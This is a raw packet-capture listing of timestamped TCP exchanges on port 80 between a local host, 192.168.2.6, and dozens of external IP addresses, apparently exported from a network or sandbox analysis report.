                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.340914965 CET8049772193.70.68.254192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.348035097 CET8049774188.114.96.3192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.348203897 CET4977480192.168.2.6188.114.96.3
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.392071009 CET8049775104.196.26.65192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.392242908 CET4977580192.168.2.6104.196.26.65
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.403743982 CET4977680192.168.2.63.130.253.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.419519901 CET4977780192.168.2.6165.227.252.190
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.420782089 CET4977580192.168.2.6104.196.26.65
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.458884954 CET4977480192.168.2.6188.114.96.3
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.480267048 CET8049774188.114.96.3192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.480350018 CET4977480192.168.2.6188.114.96.3
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.485184908 CET804977169.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.486171961 CET804977169.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.486268044 CET4977180192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.487116098 CET804977169.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.487206936 CET4977180192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.514597893 CET4977180192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.519351959 CET8049777165.227.252.190192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.519499063 CET4977780192.168.2.6165.227.252.190
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.558617115 CET80497763.130.253.23192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.558809042 CET4977680192.168.2.63.130.253.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.567164898 CET8049775104.196.26.65192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.567713976 CET8049775104.196.26.65192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.567846060 CET4977580192.168.2.6104.196.26.65
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.576255083 CET4977780192.168.2.6165.227.252.190
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.577491045 CET4977680192.168.2.63.130.253.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.614497900 CET4977880192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.629729033 CET4977980192.168.2.623.227.38.74
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.646137953 CET4977580192.168.2.6104.196.26.65
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.646450043 CET804977923.227.38.74192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.646641970 CET4977980192.168.2.623.227.38.74
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.646883011 CET4978080192.168.2.6107.180.98.101
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.647407055 CET4977980192.168.2.623.227.38.74
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.663969994 CET804977923.227.38.74192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.674961090 CET8049777165.227.252.190192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.675221920 CET8049777165.227.252.190192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.675343990 CET4977780192.168.2.6165.227.252.190
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.677503109 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.679619074 CET804977169.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.732011080 CET80497763.130.253.23192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.732059002 CET80497763.130.253.23192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.732167006 CET4977680192.168.2.63.130.253.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.732213974 CET4977680192.168.2.63.130.253.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.779529095 CET804977869.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.779758930 CET4977880192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.784085989 CET4977680192.168.2.63.130.253.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.792392969 CET8049775104.196.26.65192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.792870045 CET8049775104.196.26.65192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.792952061 CET4977580192.168.2.6104.196.26.65
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.806921005 CET804977923.227.38.74192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.807063103 CET4977980192.168.2.623.227.38.74
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.822571039 CET8049780107.180.98.101192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.822706938 CET4978080192.168.2.6107.180.98.101
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.858073950 CET4977880192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.938883066 CET80497763.130.253.23192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.939697981 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.939905882 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.992818117 CET8049765122.128.109.107192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:28.992888927 CET4976580192.168.2.6122.128.109.107
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.023241997 CET804977869.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.024262905 CET804977869.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.024382114 CET4977880192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.025150061 CET804977869.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.025238991 CET4977880192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.031135082 CET4978080192.168.2.6107.180.98.101
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.032989979 CET4977880192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.034130096 CET4978280192.168.2.63.130.253.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.034192085 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.187516928 CET4978380192.168.2.6103.3.1.161
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.189198017 CET80497823.130.253.23192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.189305067 CET4978280192.168.2.63.130.253.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.191310883 CET4978280192.168.2.63.130.253.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.197927952 CET804977869.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.206882954 CET8049780107.180.98.101192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.211090088 CET8049780107.180.98.101192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.211178064 CET4978080192.168.2.6107.180.98.101
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.220036983 CET4978080192.168.2.6107.180.98.101
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.346503973 CET80497823.130.253.23192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.346589088 CET80497823.130.253.23192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.346754074 CET4978280192.168.2.63.130.253.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.395813942 CET8049780107.180.98.101192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.464081049 CET8049783103.3.1.161192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.464386940 CET4978380192.168.2.6103.3.1.161
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.466515064 CET4978280192.168.2.63.130.253.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.556457043 CET4978380192.168.2.6103.3.1.161
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.621300936 CET80497823.130.253.23192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.652196884 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.672610044 CET8049742202.254.236.40192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.672687054 CET4974280192.168.2.6202.254.236.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.742413998 CET4978480192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.743788004 CET4978580192.168.2.6185.53.177.50
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.745227098 CET4978680192.168.2.6213.186.33.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.762310028 CET80497843.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.762629032 CET4978480192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.767002106 CET8049785185.53.177.50192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.767211914 CET4978580192.168.2.6185.53.177.50
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.770944118 CET4978480192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.773507118 CET8049786213.186.33.40192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.773653984 CET4978680192.168.2.6213.186.33.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.790162086 CET80497843.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.790206909 CET8049785185.53.177.50192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.790414095 CET4978580192.168.2.6185.53.177.50
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.790626049 CET80497843.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.790716887 CET4978480192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.800255060 CET4978680192.168.2.6213.186.33.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.809319019 CET4978780192.168.2.6208.109.214.162
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.813338995 CET8049785185.53.177.50192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.831001997 CET8049786213.186.33.40192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.831197023 CET4978680192.168.2.6213.186.33.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.832784891 CET8049783103.3.1.161192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.834336996 CET8049783103.3.1.161192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.834439039 CET4978380192.168.2.6103.3.1.161
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.916577101 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.916625977 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.916657925 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.916687012 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.916697025 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.916718006 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.916726112 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.916762114 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.951306105 CET4978880192.168.2.6143.204.9.43
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.972562075 CET8049788143.204.9.43192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.972743034 CET4978880192.168.2.6143.204.9.43
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.981833935 CET8049787208.109.214.162192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.982011080 CET4978780192.168.2.6208.109.214.162
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:29.997695923 CET4978480192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.017782927 CET80497843.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.017985106 CET4978480192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.020824909 CET4978880192.168.2.6143.204.9.43
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.022239923 CET4978680192.168.2.6213.186.33.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.023416042 CET4978980192.168.2.6147.154.0.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.023835897 CET4978780192.168.2.6208.109.214.162
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.028189898 CET8049785185.53.177.50192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.028260946 CET8049785185.53.177.50192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.028357029 CET4978580192.168.2.6185.53.177.50
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.028398037 CET4978580192.168.2.6185.53.177.50
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.028532028 CET8049785185.53.177.50192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.028558969 CET8049785185.53.177.50192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.028594971 CET4978580192.168.2.6185.53.177.50
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.028618097 CET4978580192.168.2.6185.53.177.50
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.041770935 CET8049788143.204.9.43192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.042269945 CET8049788143.204.9.43192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.042471886 CET4978880192.168.2.6143.204.9.43
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.062989950 CET4978380192.168.2.6103.3.1.161
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.088434935 CET8049786213.186.33.40192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.098153114 CET4978480192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.119699001 CET80497843.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.120105982 CET4978480192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.130307913 CET8049789147.154.0.23192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.130481005 CET4978980192.168.2.6147.154.0.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.138621092 CET4978980192.168.2.6147.154.0.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.179202080 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.179260015 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.179287910 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.179322004 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.179352999 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.179380894 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.179410934 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.179429054 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.179440022 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.179476023 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.179502010 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.188813925 CET4978880192.168.2.6143.204.9.43
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.189493895 CET4978480192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.195741892 CET8049787208.109.214.162192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.196227074 CET8049787208.109.214.162192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.196355104 CET4978780192.168.2.6208.109.214.162
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.211117029 CET8049788143.204.9.43192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.211211920 CET8049788143.204.9.43192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.211342096 CET4978880192.168.2.6143.204.9.43
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.211520910 CET80497843.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.212883949 CET4978480192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.234091997 CET8049786213.186.33.40192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.234186888 CET4978680192.168.2.6213.186.33.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.246795893 CET8049789147.154.0.23192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.258763075 CET8049789147.154.0.23192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.258807898 CET8049789147.154.0.23192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.258969069 CET4978980192.168.2.6147.154.0.23
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.342122078 CET8049783103.3.1.161192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.343873978 CET8049783103.3.1.161192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.343966007 CET4978380192.168.2.6103.3.1.161
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.367654085 CET4978780192.168.2.6208.109.214.162
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.385370016 CET4978480192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.405261993 CET80497843.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.405833006 CET4978480192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.443933010 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444036007 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444087982 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444124937 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444159985 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444204092 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444252014 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444293022 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444297075 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444335938 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444344997 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444380999 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444392920 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444426060 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444426060 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444464922 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444468975 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444489956 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444509983 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444528103 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444555998 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444575071 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444597006 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444621086 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.444664955 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.539395094 CET8049787208.109.214.162192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.539482117 CET4978780192.168.2.6208.109.214.162
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.589726925 CET4976080192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.707156897 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.707241058 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.707290888 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.707318068 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.707340956 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.707344055 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.707374096 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.707376003 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.707400084 CET8049781154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.707459927 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.707490921 CET4978180192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.964570999 CET4979080192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.095352888 CET804979074.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.095570087 CET4979080192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.103770971 CET4979080192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.154886961 CET4979180192.168.2.6103.224.182.241
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.156269073 CET4979280192.168.2.6198.100.146.220
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.216070890 CET8049727213.186.33.17192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.216268063 CET4972780192.168.2.6213.186.33.17
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.234829903 CET804979074.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.324114084 CET8049791103.224.182.241192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.324390888 CET4979180192.168.2.6103.224.182.241
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.341873884 CET4979180192.168.2.6103.224.182.241
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.351429939 CET804976039.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.351793051 CET4976080192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.374038935 CET4976080192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.531599998 CET8049791103.224.182.241192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.531644106 CET8049791103.224.182.241192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.531728029 CET4979180192.168.2.6103.224.182.241
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.532732964 CET4979180192.168.2.6103.224.182.241
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.601459980 CET804979074.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.601510048 CET804979074.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.601541042 CET804979074.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.601567984 CET804979074.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.601667881 CET804979074.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.601672888 CET4979080192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.601728916 CET4979080192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.601748943 CET4979080192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.604197979 CET804979074.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.604351997 CET4979080192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.604455948 CET804979074.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.604489088 CET804979074.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.604619980 CET804979074.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.604809046 CET804979074.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.605319023 CET4979080192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.700933933 CET8049791103.224.182.241192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.732392073 CET804979074.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.732440948 CET804979074.208.215.199192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.732610941 CET4979080192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.732646942 CET4979080192.168.2.674.208.215.199
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:31.737260103 CET804979074.208.215.199192.168.2.6
